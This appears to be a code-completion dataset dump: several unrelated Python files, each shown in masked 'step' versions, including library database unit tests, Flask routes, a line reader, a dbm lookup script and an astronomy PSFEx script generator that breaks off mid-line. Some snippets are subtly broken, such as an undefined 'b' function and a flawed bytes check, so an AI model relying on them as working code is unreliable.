"step-3": "<mask token>\n\n\nclass Test_DatabaseUtils(unittest.TestCase):\n\n def setUp(self):\n self.db = DatabaseUtils()\n <mask token>\n\n def test_getUser(self):\n count = self.dataCount()\n try:\n trueResult = self.db.getUser('username')\n print('Test passed')\n except:\n print('Test failed')\n\n def test_insertBookTransaction(self):\n testData = 1, 1, '2019-01-01', 'abc'\n result = self.db.insertBookTransaction(testData[0], testData[1],\n testData[2], testData[3])\n print('result: ', result)\n self.assertTrue(result)\n\n def test_updateBookStatus(self):\n testData = 1, 'anything'\n result = self.db.updateBookStatus(testData[1], testData[0])\n self.assertFalse(result)\n\n def test_updateBookTransaction(self):\n testData = 1, 'anything', '2019-01-01'\n result = self.db.updateBookTransaction(testData[0], testData[1],\n testData[2])\n self.assertFalse(result)\n\n def test_searchBooks(self):\n result = self.db.searchBooks('abc')\n self.assertFalse(result)\n result = self.db.searchBooks('Harry')\n self.assertTrue(result)\n\n def test_searchBooksAuthur(self):\n result = self.db.searchBooksAuthur('abc')\n self.assertFalse(result)\n result = self.db.searchBooksAuthur('gavin')\n self.assertTrue(result)\n\n def test_searchBooksISBN(self):\n result = self.db.searchBooksISBN(1)\n self.assertFalse(result)\n\n def test_listBooks(self):\n result = self.db.listBooks()\n self.assertTrue(result)\n\n def test_getBook(self):\n result = self.db.getBook(1)\n self.assertTrue(result)\n\n def test_getBookISBN(self):\n result = self.db.getBookISBN(1)\n self.assertFalse(result)\n <mask token>\n\n def test_getReturnBook(self):\n result = self.db.getReturnBook(1, 1)\n self.assertTrue(result)\n\n\n<mask token>\n",
"step-4": "import unittest\nimport sys\nsys.path.append('..')\nfrom database_utils import DatabaseUtils\n\n\nclass Test_DatabaseUtils(unittest.TestCase):\n\n def setUp(self):\n self.db = DatabaseUtils()\n\n def dataCount(self):\n with self.db.connection.cursor() as cursor:\n cursor.execute('select count(*) from LmsUser')\n return cursor.fetchone()[0]\n\n def test_getUser(self):\n count = self.dataCount()\n try:\n trueResult = self.db.getUser('username')\n print('Test passed')\n except:\n print('Test failed')\n\n def test_insertBookTransaction(self):\n testData = 1, 1, '2019-01-01', 'abc'\n result = self.db.insertBookTransaction(testData[0], testData[1],\n testData[2], testData[3])\n print('result: ', result)\n self.assertTrue(result)\n\n def test_updateBookStatus(self):\n testData = 1, 'anything'\n result = self.db.updateBookStatus(testData[1], testData[0])\n self.assertFalse(result)\n\n def test_updateBookTransaction(self):\n testData = 1, 'anything', '2019-01-01'\n result = self.db.updateBookTransaction(testData[0], testData[1],\n testData[2])\n self.assertFalse(result)\n\n def test_searchBooks(self):\n result = self.db.searchBooks('abc')\n self.assertFalse(result)\n result = self.db.searchBooks('Harry')\n self.assertTrue(result)\n\n def test_searchBooksAuthur(self):\n result = self.db.searchBooksAuthur('abc')\n self.assertFalse(result)\n result = self.db.searchBooksAuthur('gavin')\n self.assertTrue(result)\n\n def test_searchBooksISBN(self):\n result = self.db.searchBooksISBN(1)\n self.assertFalse(result)\n\n def test_listBooks(self):\n result = self.db.listBooks()\n self.assertTrue(result)\n\n def test_getBook(self):\n result = self.db.getBook(1)\n self.assertTrue(result)\n\n def test_getBookISBN(self):\n result = self.db.getBookISBN(1)\n self.assertFalse(result)\n\n def test_listReturnBooks(self):\n result = self.db.listReturnBooks(1)\n self.assertTrue(result)\n\n def test_getReturnBook(self):\n result = self.db.getReturnBook(1, 1)\n self.assertTrue(result)\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-5": "# Reference: https://docs.python.org/2/library/unittest.html\nimport unittest\nimport sys\nsys.path.append('..')\nfrom database_utils import DatabaseUtils\n\nclass Test_DatabaseUtils(unittest.TestCase):\n def setUp(self):\n self.db=DatabaseUtils()\n \n def dataCount(self):\n with self.db.connection.cursor() as cursor:\n cursor.execute(\"select count(*) from LmsUser\")\n return cursor.fetchone()[0]\n\n def test_getUser(self):\n count = self.dataCount()\n try:\n trueResult=self.db.getUser(\"username\")\n print(\"Test passed\")\n except:\n print(\"Test failed\")\n\n def test_insertBookTransaction(self):\n testData=(1,1,\"2019-01-01\",\"abc\")\n result=self.db.insertBookTransaction(testData[0],testData[1],testData[2],testData[3])\n print(\"result: \",result)\n self.assertTrue(result)\n\n def test_updateBookStatus(self):\n testData=(1,\"anything\")\n result=self.db.updateBookStatus(testData[1],testData[0])\n self.assertFalse(result)\n\n def test_updateBookTransaction(self):\n testData=(1,\"anything\",\"2019-01-01\")\n result=self.db.updateBookTransaction(testData[0],testData[1],testData[2])\n self.assertFalse(result)\n \n def test_searchBooks(self):\n result=self.db.searchBooks(\"abc\")\n self.assertFalse(result)\n result=self.db.searchBooks(\"Harry\")\n self.assertTrue(result)\n \n def test_searchBooksAuthur(self):\n result=self.db.searchBooksAuthur(\"abc\")\n self.assertFalse(result)\n result=self.db.searchBooksAuthur(\"gavin\")\n self.assertTrue(result)\n \n def test_searchBooksISBN(self):\n result=self.db.searchBooksISBN(1)\n self.assertFalse(result)\n\n def test_listBooks(self):\n result=self.db.listBooks()\n self.assertTrue(result)\n\n def test_getBook(self):\n result=self.db.getBook(1)\n self.assertTrue(result)\n\n def test_getBookISBN(self):\n result=self.db.getBookISBN(1)\n self.assertFalse(result)\n\n def test_listReturnBooks(self):\n result=self.db.listReturnBooks(1)\n self.assertTrue(result)\n\n def test_getReturnBook(self):\n result=self.db.getReturnBook(1,1)\n self.assertTrue(result)\n\nif __name__ == \"__main__\":\n unittest.main()",
"step-ids": [
9,
10,
13,
17,
18
]
}
|
[
9,
10,
13,
17,
18
] |
from flask import render_template, url_for, escape, redirect, abort
from app import core
from database import db
@core.route('/post')
@core.route('/categorie')
@core.route('/tag')
def returnToHome():
return redirect(url_for('home'))
|
normal
|
{
"blob_id": "c27d6279d1ea84bab3c0abd4ca9a08de202219da",
"index": 1748,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\[email protected]('/post')\[email protected]('/categorie')\[email protected]('/tag')\ndef returnToHome():\n return redirect(url_for('home'))\n",
"step-3": "from flask import render_template, url_for, escape, redirect, abort\nfrom app import core\nfrom database import db\n\n\[email protected]('/post')\[email protected]('/categorie')\[email protected]('/tag')\ndef returnToHome():\n return redirect(url_for('home'))\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
def assert_number(arg):
if not isinstance(arg, (int, float)):
raise TypeError(f"Expected number, got {type(arg)}")
|
normal
|
{
"blob_id": "2de62c73507acac597d70557adfe8286e2f28a1f",
"index": 5569,
"step-1": "<mask token>\n",
"step-2": "def assert_number(arg):\n if not isinstance(arg, (int, float)):\n raise TypeError(f'Expected number, got {type(arg)}')\n",
"step-3": "def assert_number(arg):\n if not isinstance(arg, (int, float)):\n raise TypeError(f\"Expected number, got {type(arg)}\")\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
def get_char():
global next_c, limit
if next_c == limit:
next_c = 0
limit = read(0, 100)
if limit == 0:
return ''
if next_c >= len(limit) - 1:
return ''
ch = chr(limit[next_c])
next_c += 1
return ch
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def get_char():
global next_c, limit
if next_c == limit:
next_c = 0
limit = read(0, 100)
if limit == 0:
return ''
if next_c >= len(limit) - 1:
return ''
ch = chr(limit[next_c])
next_c += 1
return ch
def my_read_line():
global next_c, limit
line = ''
ch = get_char()
while ch != '\n':
line += ch
ch = get_char()
if ch == '':
return line
next_c = 0
limit = 0
line += '\n'
return line
<|reserved_special_token_1|>
<|reserved_special_token_0|>
next_c = 0
limit = 0
def get_char():
global next_c, limit
if next_c == limit:
next_c = 0
limit = read(0, 100)
if limit == 0:
return ''
if next_c >= len(limit) - 1:
return ''
ch = chr(limit[next_c])
next_c += 1
return ch
def my_read_line():
global next_c, limit
line = ''
ch = get_char()
while ch != '\n':
line += ch
ch = get_char()
if ch == '':
return line
next_c = 0
limit = 0
line += '\n'
return line
<|reserved_special_token_1|>
<|reserved_special_token_0|>
from os import read
next_c = 0
limit = 0
def get_char():
global next_c, limit
if next_c == limit:
next_c = 0
limit = read(0, 100)
if limit == 0:
return ''
if next_c >= len(limit) - 1:
return ''
ch = chr(limit[next_c])
next_c += 1
return ch
def my_read_line():
global next_c, limit
line = ''
ch = get_char()
while ch != '\n':
line += ch
ch = get_char()
if ch == '':
return line
next_c = 0
limit = 0
line += '\n'
return line
<|reserved_special_token_1|>
'''
Paulie Jo Gonzalez
CS 4375 - os
Lab 0
Last modified: 02/14/2021
This code includes a reference to C code for my_getChar method provided by Dr. Freudenthal.
'''
from os import read
next_c = 0
limit = 0
def get_char():
global next_c, limit
if next_c == limit:
next_c = 0
limit = read(0, 100) # allocate bytes
if limit == 0:
return ''
if next_c >= len(limit) - 1: # check upperbound
return ''
ch = chr(limit[next_c]) # convert to char (from ASCII)
next_c += 1
return ch
def my_read_line():
global next_c, limit
line = ''
ch = get_char()
# get each char of line
while (ch != '\n'): # while char is not new line
line += ch # build line
ch = get_char()
if ch == '':
return line # EOF
next_c = 0 # reset next_c and limit after line is read
limit = 0
line += '\n'
return line
# def my_read_lines():
# num_lines = 0
# in_line = my_read_line() # read line
# while len(in_line):
# num_lines += 1
# print(f'###line {num_lines}: <{str(in_line)}> ###\n')
# in_line = my_read_lines()
# print(f'eof after {num_lines}\n')
|
flexible
|
{
"blob_id": "67ac5d82bc37b67cfdae73b6667b73b70ed33cfb",
"index": 8868,
"step-1": "<mask token>\n\n\ndef get_char():\n global next_c, limit\n if next_c == limit:\n next_c = 0\n limit = read(0, 100)\n if limit == 0:\n return ''\n if next_c >= len(limit) - 1:\n return ''\n ch = chr(limit[next_c])\n next_c += 1\n return ch\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_char():\n global next_c, limit\n if next_c == limit:\n next_c = 0\n limit = read(0, 100)\n if limit == 0:\n return ''\n if next_c >= len(limit) - 1:\n return ''\n ch = chr(limit[next_c])\n next_c += 1\n return ch\n\n\ndef my_read_line():\n global next_c, limit\n line = ''\n ch = get_char()\n while ch != '\\n':\n line += ch\n ch = get_char()\n if ch == '':\n return line\n next_c = 0\n limit = 0\n line += '\\n'\n return line\n",
"step-3": "<mask token>\nnext_c = 0\nlimit = 0\n\n\ndef get_char():\n global next_c, limit\n if next_c == limit:\n next_c = 0\n limit = read(0, 100)\n if limit == 0:\n return ''\n if next_c >= len(limit) - 1:\n return ''\n ch = chr(limit[next_c])\n next_c += 1\n return ch\n\n\ndef my_read_line():\n global next_c, limit\n line = ''\n ch = get_char()\n while ch != '\\n':\n line += ch\n ch = get_char()\n if ch == '':\n return line\n next_c = 0\n limit = 0\n line += '\\n'\n return line\n",
"step-4": "<mask token>\nfrom os import read\nnext_c = 0\nlimit = 0\n\n\ndef get_char():\n global next_c, limit\n if next_c == limit:\n next_c = 0\n limit = read(0, 100)\n if limit == 0:\n return ''\n if next_c >= len(limit) - 1:\n return ''\n ch = chr(limit[next_c])\n next_c += 1\n return ch\n\n\ndef my_read_line():\n global next_c, limit\n line = ''\n ch = get_char()\n while ch != '\\n':\n line += ch\n ch = get_char()\n if ch == '':\n return line\n next_c = 0\n limit = 0\n line += '\\n'\n return line\n",
"step-5": "'''\nPaulie Jo Gonzalez\nCS 4375 - os\nLab 0\nLast modified: 02/14/2021\nThis code includes a reference to C code for my_getChar method provided by Dr. Freudenthal.\n'''\n\nfrom os import read\n\nnext_c = 0\nlimit = 0\n\n\ndef get_char():\n global next_c, limit\n\n if next_c == limit:\n next_c = 0\n limit = read(0, 100) # allocate bytes\n\n if limit == 0:\n return ''\n\n if next_c >= len(limit) - 1: # check upperbound\n return ''\n ch = chr(limit[next_c]) # convert to char (from ASCII)\n next_c += 1\n\n return ch\n\n\ndef my_read_line():\n global next_c, limit\n\n line = ''\n ch = get_char()\n\n # get each char of line\n while (ch != '\\n'): # while char is not new line\n line += ch # build line\n ch = get_char()\n if ch == '':\n return line # EOF\n\n next_c = 0 # reset next_c and limit after line is read\n limit = 0\n line += '\\n'\n\n return line\n\n\n# def my_read_lines():\n# num_lines = 0\n# in_line = my_read_line() # read line\n\n# while len(in_line):\n# num_lines += 1\n# print(f'###line {num_lines}: <{str(in_line)}> ###\\n')\n\n# in_line = my_read_lines()\n# print(f'eof after {num_lines}\\n')\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
with open('dummyoutput.txt', 'r') as file_object:
data = file_object.readlines()
for line in data:
words = line.split(';')
for i in range(1, len(words), 4):
if db.get(words[i], 0) != 0:
cmd1 = db.get(words[i])
cmd2 = db.get(words[i + 2])
space = b(' ')
cmd = cmd1 + space + cmd2
print(cmd)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
db = dbm.open('resistorvalues', 'c')
with open('dummyoutput.txt', 'r') as file_object:
data = file_object.readlines()
for line in data:
words = line.split(';')
for i in range(1, len(words), 4):
if db.get(words[i], 0) != 0:
cmd1 = db.get(words[i])
cmd2 = db.get(words[i + 2])
space = b(' ')
cmd = cmd1 + space + cmd2
print(cmd)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import dbm
db = dbm.open('resistorvalues', 'c')
with open('dummyoutput.txt', 'r') as file_object:
data = file_object.readlines()
for line in data:
words = line.split(';')
for i in range(1, len(words), 4):
if db.get(words[i], 0) != 0:
cmd1 = db.get(words[i])
cmd2 = db.get(words[i + 2])
space = b(' ')
cmd = cmd1 + space + cmd2
print(cmd)
<|reserved_special_token_1|>
"""
Looks up values in createresistorvaluesdbm.py.
Outputs string value ( cmd ).
"""
import dbm
# Open a DB. The c option opens in read/write mode and creates the file if needed.
db = dbm.open( 'resistorvalues', 'c' )
with open( "dummyoutput.txt", "r" ) as file_object:
#print (file_object.readline(6))
data = file_object.readlines()
# Go through serial string line by line
for line in data:
# parse on semi-colon
words = line.split( ";" )
#print (line.rsplit(";"))
# Ignore position information and pull out resistor values
# Note every fourth item to compensate for word pairs
for i in range( 1, len( words ), 4 ):
# print(words[i])
# the get method has 2 vlues lookup, and what to return is no match in this case is `0`
if db.get( words[ i ], 0 ) != 0:
# Direction, i.e. "f"
cmd1 = db.get( words[ i ] )
# Value, i.e. "10"
cmd2 = db.get( words[ i + 2 ] )
# Formatting space
space = b( ' ' )
cmd = cmd1 + space + cmd2
#print (cmd.decode('ascii'))
print ( cmd )
|
flexible
|
{
"blob_id": "69eb62ba47a63cf007334c777709b0513d75f396",
"index": 1504,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwith open('dummyoutput.txt', 'r') as file_object:\n data = file_object.readlines()\n for line in data:\n words = line.split(';')\n for i in range(1, len(words), 4):\n if db.get(words[i], 0) != 0:\n cmd1 = db.get(words[i])\n cmd2 = db.get(words[i + 2])\n space = b(' ')\n cmd = cmd1 + space + cmd2\n print(cmd)\n",
"step-3": "<mask token>\ndb = dbm.open('resistorvalues', 'c')\nwith open('dummyoutput.txt', 'r') as file_object:\n data = file_object.readlines()\n for line in data:\n words = line.split(';')\n for i in range(1, len(words), 4):\n if db.get(words[i], 0) != 0:\n cmd1 = db.get(words[i])\n cmd2 = db.get(words[i + 2])\n space = b(' ')\n cmd = cmd1 + space + cmd2\n print(cmd)\n",
"step-4": "<mask token>\nimport dbm\ndb = dbm.open('resistorvalues', 'c')\nwith open('dummyoutput.txt', 'r') as file_object:\n data = file_object.readlines()\n for line in data:\n words = line.split(';')\n for i in range(1, len(words), 4):\n if db.get(words[i], 0) != 0:\n cmd1 = db.get(words[i])\n cmd2 = db.get(words[i + 2])\n space = b(' ')\n cmd = cmd1 + space + cmd2\n print(cmd)\n",
"step-5": "\"\"\"\r\n Looks up values in createresistorvaluesdbm.py.\r\n Outputs string value ( cmd ).\r\n\"\"\"\r\n\r\nimport dbm\r\n\r\n# Open a DB. The c option opens in read/write mode and creates the file if needed.\r\ndb = dbm.open( 'resistorvalues', 'c' )\r\n\r\n\r\nwith open( \"dummyoutput.txt\", \"r\" ) as file_object:\r\n#print (file_object.readline(6))\r\n data = file_object.readlines()\r\n # Go through serial string line by line\r\n for line in data:\r\n # parse on semi-colon\r\n words = line.split( \";\" )\r\n #print (line.rsplit(\";\"))\r\n # Ignore position information and pull out resistor values\r\n # Note every fourth item to compensate for word pairs\r\n for i in range( 1, len( words ), 4 ):\r\n # print(words[i])\r\n # the get method has 2 vlues lookup, and what to return is no match in this case is `0`\r\n if db.get( words[ i ], 0 ) != 0:\r\n # Direction, i.e. \"f\"\r\n cmd1 = db.get( words[ i ] )\r\n # Value, i.e. \"10\"\r\n cmd2 = db.get( words[ i + 2 ] )\r\n # Formatting space\r\n space = b( ' ' )\r\n cmd = cmd1 + space + cmd2\r\n #print (cmd.decode('ascii'))\r\n print ( cmd )\r\n\r\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu May 21 11:40:26 2020
@author: jlee
"""
import time
start_time = time.time()
import numpy as np
import glob, os
from astropy.io import fits
import init_cfg as ic
# ----- Making scripts for PSFEx ----- #
os.system("psfex -dd > config.psfex")
if ic.use_backsub:
prefix = 'b'
else:
prefix = ''
f = open('psfex_all.sh','w')
f.write('\n')
f.write('#############################'+'\n')
f.write('##### Scripts for PSFEx #####'+'\n')
f.write('#############################'+'\n')
f.write('\n')
for i in np.arange(len(ic.fields)):
f.write('# ----- HSC field : '+ic.fields[i]+' ----- #'+'\n')
f.write('\n')
for j in np.arange(len(ic.filters)):
flt = ic.filters[j].split('-')[1]
f.write('rm -rfv prepsfex_'+flt+'.cat\n')
f.write('sex Images/'+prefix+ic.fields[i]+'-'+flt+'.fits -c prepsfex.sex -CATALOG_NAME prepsfex_'+flt+'.cat ')
f.write('-DETECT_THRESH {0:.1f} -ANALYSIS_THRESH {0:.1f} '.format(ic.THRES_psf))
f.write(f"-MAG_ZEROPOINT {ic.MAG0:.1f} -GAIN {ic.GAIN0[i][j]:.1f} -SEEING_FWHM {ic.SEEING0:.2f}\n")
f.write('sex Images/'+prefix+ic.fields[i]+'-'+flt+'.fits -c prepsfex.sex -CATALOG_NAME prepsfex_'+ic.fields[i]+'-'+flt+'.cat -CATALOG_TYPE ASCII_HEAD ')
f.write('-DETECT_THRESH {0:.1f} -ANALYSIS_THRESH {0:.1f} '.format(ic.THRES_psf))
f.write(f"-MAG_ZEROPOINT {ic.MAG0:.1f} -GAIN {ic.GAIN0[i][j]:.1f} -SEEING_FWHM {ic.SEEING0:.2f}\n")
f.write('psfex prepsfex_'+flt+'.cat -c config.psfex ')
f.write(f"-SAMPLE_FWHMRANGE {ic.FWHMR_psf[0]:.1f},{ic.FWHMR_psf[1]:.1f} ")
f.write(f"-SAMPLE_MINSN {ic.MINSN_psf:.1f} -SAMPLE_MAXELLIP {ic.MAXEL_psf:.2f} ")
f.write('-OUTCAT_TYPE ASCII_HEAD -OUTCAT_NAME psf_'+ic.fields[i]+'-'+flt+'.cat ')
f.write('-CHECKPLOT_TYPE NONE -XML_NAME psf_'+ic.fields[i]+'-'+flt+'.xml\n')
f.write('mv -v prepsfex_'+flt+'.psf psf_'+ic.fields[i]+'-'+flt+'.psf\n')
f.write('\n')
f.write('\n\n')
f.close()
# ----- Running scripts for PSFEx ----- #
if (glob.glob("PSFEx/") == []):
os.system("mkdir PSFEx")
else:
os.system("rm -rfv PSFEx/*")
os.system("sh psfex_all.sh")
os.system("mv -v psf_*.cat psf_*.xml psf_*.psf PSFEx/")
os.system("mv -v prepsfex_*-*.cat PSFEx/")
os.system("rm -rfv ./*.fits prepsfex_*.cat")
# Printing the running time
print("--- %s seconds ---" % (time.time() - start_time))
|
normal
|
{
"blob_id": "c23125018a77508dad6fd2cb86ec6d556fbd1019",
"index": 90,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nos.system('psfex -dd > config.psfex')\nif ic.use_backsub:\n prefix = 'b'\nelse:\n prefix = ''\n<mask token>\nf.write('\\n')\nf.write('#############################' + '\\n')\nf.write('##### Scripts for PSFEx #####' + '\\n')\nf.write('#############################' + '\\n')\nf.write('\\n')\nfor i in np.arange(len(ic.fields)):\n f.write('# ----- HSC field : ' + ic.fields[i] + ' ----- #' + '\\n')\n f.write('\\n')\n for j in np.arange(len(ic.filters)):\n flt = ic.filters[j].split('-')[1]\n f.write('rm -rfv prepsfex_' + flt + '.cat\\n')\n f.write('sex Images/' + prefix + ic.fields[i] + '-' + flt +\n '.fits -c prepsfex.sex -CATALOG_NAME prepsfex_' + flt + '.cat ')\n f.write('-DETECT_THRESH {0:.1f} -ANALYSIS_THRESH {0:.1f} '.format(\n ic.THRES_psf))\n f.write(\n f\"\"\"-MAG_ZEROPOINT {ic.MAG0:.1f} -GAIN {ic.GAIN0[i][j]:.1f} -SEEING_FWHM {ic.SEEING0:.2f}\n\"\"\"\n )\n f.write('sex Images/' + prefix + ic.fields[i] + '-' + flt +\n '.fits -c prepsfex.sex -CATALOG_NAME prepsfex_' + ic.fields[i] +\n '-' + flt + '.cat -CATALOG_TYPE ASCII_HEAD ')\n f.write('-DETECT_THRESH {0:.1f} -ANALYSIS_THRESH {0:.1f} '.format(\n ic.THRES_psf))\n f.write(\n f\"\"\"-MAG_ZEROPOINT {ic.MAG0:.1f} -GAIN {ic.GAIN0[i][j]:.1f} -SEEING_FWHM {ic.SEEING0:.2f}\n\"\"\"\n )\n f.write('psfex prepsfex_' + flt + '.cat -c config.psfex ')\n f.write(\n f'-SAMPLE_FWHMRANGE {ic.FWHMR_psf[0]:.1f},{ic.FWHMR_psf[1]:.1f} ')\n f.write(\n f'-SAMPLE_MINSN {ic.MINSN_psf:.1f} -SAMPLE_MAXELLIP {ic.MAXEL_psf:.2f} '\n )\n f.write('-OUTCAT_TYPE ASCII_HEAD -OUTCAT_NAME psf_' + ic.fields[i] +\n '-' + flt + '.cat ')\n f.write('-CHECKPLOT_TYPE NONE -XML_NAME psf_' + ic.fields[i] + '-' +\n flt + '.xml\\n')\n f.write('mv -v prepsfex_' + flt + '.psf psf_' + ic.fields[i] + '-' +\n flt + '.psf\\n')\n f.write('\\n')\n f.write('\\n\\n')\nf.close()\nif glob.glob('PSFEx/') == []:\n os.system('mkdir PSFEx')\nelse:\n os.system('rm -rfv PSFEx/*')\nos.system('sh psfex_all.sh')\nos.system('mv -v psf_*.cat psf_*.xml psf_*.psf PSFEx/')\nos.system('mv -v prepsfex_*-*.cat PSFEx/')\nos.system('rm -rfv ./*.fits prepsfex_*.cat')\nprint('--- %s seconds ---' % (time.time() - start_time))\n",
"step-3": "<mask token>\nstart_time = time.time()\n<mask token>\nos.system('psfex -dd > config.psfex')\nif ic.use_backsub:\n prefix = 'b'\nelse:\n prefix = ''\nf = open('psfex_all.sh', 'w')\nf.write('\\n')\nf.write('#############################' + '\\n')\nf.write('##### Scripts for PSFEx #####' + '\\n')\nf.write('#############################' + '\\n')\nf.write('\\n')\nfor i in np.arange(len(ic.fields)):\n f.write('# ----- HSC field : ' + ic.fields[i] + ' ----- #' + '\\n')\n f.write('\\n')\n for j in np.arange(len(ic.filters)):\n flt = ic.filters[j].split('-')[1]\n f.write('rm -rfv prepsfex_' + flt + '.cat\\n')\n f.write('sex Images/' + prefix + ic.fields[i] + '-' + flt +\n '.fits -c prepsfex.sex -CATALOG_NAME prepsfex_' + flt + '.cat ')\n f.write('-DETECT_THRESH {0:.1f} -ANALYSIS_THRESH {0:.1f} '.format(\n ic.THRES_psf))\n f.write(\n f\"\"\"-MAG_ZEROPOINT {ic.MAG0:.1f} -GAIN {ic.GAIN0[i][j]:.1f} -SEEING_FWHM {ic.SEEING0:.2f}\n\"\"\"\n )\n f.write('sex Images/' + prefix + ic.fields[i] + '-' + flt +\n '.fits -c prepsfex.sex -CATALOG_NAME prepsfex_' + ic.fields[i] +\n '-' + flt + '.cat -CATALOG_TYPE ASCII_HEAD ')\n f.write('-DETECT_THRESH {0:.1f} -ANALYSIS_THRESH {0:.1f} '.format(\n ic.THRES_psf))\n f.write(\n f\"\"\"-MAG_ZEROPOINT {ic.MAG0:.1f} -GAIN {ic.GAIN0[i][j]:.1f} -SEEING_FWHM {ic.SEEING0:.2f}\n\"\"\"\n )\n f.write('psfex prepsfex_' + flt + '.cat -c config.psfex ')\n f.write(\n f'-SAMPLE_FWHMRANGE {ic.FWHMR_psf[0]:.1f},{ic.FWHMR_psf[1]:.1f} ')\n f.write(\n f'-SAMPLE_MINSN {ic.MINSN_psf:.1f} -SAMPLE_MAXELLIP {ic.MAXEL_psf:.2f} '\n )\n f.write('-OUTCAT_TYPE ASCII_HEAD -OUTCAT_NAME psf_' + ic.fields[i] +\n '-' + flt + '.cat ')\n f.write('-CHECKPLOT_TYPE NONE -XML_NAME psf_' + ic.fields[i] + '-' +\n flt + '.xml\\n')\n f.write('mv -v prepsfex_' + flt + '.psf psf_' + ic.fields[i] + '-' +\n flt + '.psf\\n')\n f.write('\\n')\n f.write('\\n\\n')\nf.close()\nif glob.glob('PSFEx/') == []:\n os.system('mkdir PSFEx')\nelse:\n os.system('rm -rfv PSFEx/*')\nos.system('sh psfex_all.sh')\nos.system('mv -v psf_*.cat psf_*.xml psf_*.psf PSFEx/')\nos.system('mv -v prepsfex_*-*.cat PSFEx/')\nos.system('rm -rfv ./*.fits prepsfex_*.cat')\nprint('--- %s seconds ---' % (time.time() - start_time))\n",
"step-4": "<mask token>\nimport time\nstart_time = time.time()\nimport numpy as np\nimport glob, os\nfrom astropy.io import fits\nimport init_cfg as ic\nos.system('psfex -dd > config.psfex')\nif ic.use_backsub:\n prefix = 'b'\nelse:\n prefix = ''\nf = open('psfex_all.sh', 'w')\nf.write('\\n')\nf.write('#############################' + '\\n')\nf.write('##### Scripts for PSFEx #####' + '\\n')\nf.write('#############################' + '\\n')\nf.write('\\n')\nfor i in np.arange(len(ic.fields)):\n f.write('# ----- HSC field : ' + ic.fields[i] + ' ----- #' + '\\n')\n f.write('\\n')\n for j in np.arange(len(ic.filters)):\n flt = ic.filters[j].split('-')[1]\n f.write('rm -rfv prepsfex_' + flt + '.cat\\n')\n f.write('sex Images/' + prefix + ic.fields[i] + '-' + flt +\n '.fits -c prepsfex.sex -CATALOG_NAME prepsfex_' + flt + '.cat ')\n f.write('-DETECT_THRESH {0:.1f} -ANALYSIS_THRESH {0:.1f} '.format(\n ic.THRES_psf))\n f.write(\n f\"\"\"-MAG_ZEROPOINT {ic.MAG0:.1f} -GAIN {ic.GAIN0[i][j]:.1f} -SEEING_FWHM {ic.SEEING0:.2f}\n\"\"\"\n )\n f.write('sex Images/' + prefix + ic.fields[i] + '-' + flt +\n '.fits -c prepsfex.sex -CATALOG_NAME prepsfex_' + ic.fields[i] +\n '-' + flt + '.cat -CATALOG_TYPE ASCII_HEAD ')\n f.write('-DETECT_THRESH {0:.1f} -ANALYSIS_THRESH {0:.1f} '.format(\n ic.THRES_psf))\n f.write(\n f\"\"\"-MAG_ZEROPOINT {ic.MAG0:.1f} -GAIN {ic.GAIN0[i][j]:.1f} -SEEING_FWHM {ic.SEEING0:.2f}\n\"\"\"\n )\n f.write('psfex prepsfex_' + flt + '.cat -c config.psfex ')\n f.write(\n f'-SAMPLE_FWHMRANGE {ic.FWHMR_psf[0]:.1f},{ic.FWHMR_psf[1]:.1f} ')\n f.write(\n f'-SAMPLE_MINSN {ic.MINSN_psf:.1f} -SAMPLE_MAXELLIP {ic.MAXEL_psf:.2f} '\n )\n f.write('-OUTCAT_TYPE ASCII_HEAD -OUTCAT_NAME psf_' + ic.fields[i] +\n '-' + flt + '.cat ')\n f.write('-CHECKPLOT_TYPE NONE -XML_NAME psf_' + ic.fields[i] + '-' +\n flt + '.xml\\n')\n f.write('mv -v prepsfex_' + flt + '.psf psf_' + ic.fields[i] + '-' +\n flt + '.psf\\n')\n f.write('\\n')\n f.write('\\n\\n')\nf.close()\nif glob.glob('PSFEx/') == []:\n os.system('mkdir PSFEx')\nelse:\n os.system('rm -rfv PSFEx/*')\nos.system('sh psfex_all.sh')\nos.system('mv -v psf_*.cat psf_*.xml psf_*.psf PSFEx/')\nos.system('mv -v prepsfex_*-*.cat PSFEx/')\nos.system('rm -rfv ./*.fits prepsfex_*.cat')\nprint('--- %s seconds ---' % (time.time() - start_time))\n",
"step-5": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 21 11:40:26 2020\n\n@author: jlee\n\"\"\"\n\n\nimport time\nstart_time = time.time()\n\nimport numpy as np\nimport glob, os\nfrom astropy.io import fits\n\nimport init_cfg as ic\n\n\n# ----- Making scripts for PSFEx ----- #\nos.system(\"psfex -dd > config.psfex\")\n\nif ic.use_backsub:\n\tprefix = 'b'\nelse:\n\tprefix = ''\n\nf = open('psfex_all.sh','w')\nf.write('\\n')\nf.write('#############################'+'\\n')\nf.write('##### Scripts for PSFEx #####'+'\\n')\nf.write('#############################'+'\\n')\nf.write('\\n')\nfor i in np.arange(len(ic.fields)):\n\tf.write('# ----- HSC field : '+ic.fields[i]+' ----- #'+'\\n')\n\tf.write('\\n')\n\tfor j in np.arange(len(ic.filters)):\n\t\tflt = ic.filters[j].split('-')[1]\n\t\tf.write('rm -rfv prepsfex_'+flt+'.cat\\n')\n\t\tf.write('sex Images/'+prefix+ic.fields[i]+'-'+flt+'.fits -c prepsfex.sex -CATALOG_NAME prepsfex_'+flt+'.cat ')\n\t\tf.write('-DETECT_THRESH {0:.1f} -ANALYSIS_THRESH {0:.1f} '.format(ic.THRES_psf))\n\t\tf.write(f\"-MAG_ZEROPOINT {ic.MAG0:.1f} -GAIN {ic.GAIN0[i][j]:.1f} -SEEING_FWHM 